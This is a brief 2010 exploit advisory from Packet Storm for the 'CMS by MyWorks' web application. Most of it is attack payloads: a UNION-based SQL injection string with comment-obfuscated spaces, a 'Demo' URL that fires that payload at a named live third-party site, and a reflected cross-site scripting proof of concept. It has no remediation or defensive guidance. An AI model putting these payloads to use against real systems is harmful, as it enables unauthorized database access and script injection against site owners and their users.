CMS By MyWorks SQL Injection / Cross Site Scripting

2010-03-01T00:00:00
ID PACKETSTORM:86799
Type packetstorm
Reporter Palyo34
Modified 2010-03-01T00:00:00

Description

                                        
                                            `CMS by MyWorks SQL/ XSS Vulnerability   
========================================================   
  
####################################################################   
# Author : Palyo34  
  
# Home : www.1923Turk.com   
  
# Script : CMS by MyWorks   
  
# Script site: http://www.myworks.spb.ru/   
  
####################################################################   
  
===[ Exploit ]===   
  
http://server/catalog/good.php?good_id= SQL INJECTION   
  
1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12  
  
Demo:   
  
http://happyday-spb.ru/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12  
  
  
###################################################################  
  
  
===[XSS Vulnerability]===   
  
  
http://server/catalog/good.php?good_id=  
  
  
http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>  
  
`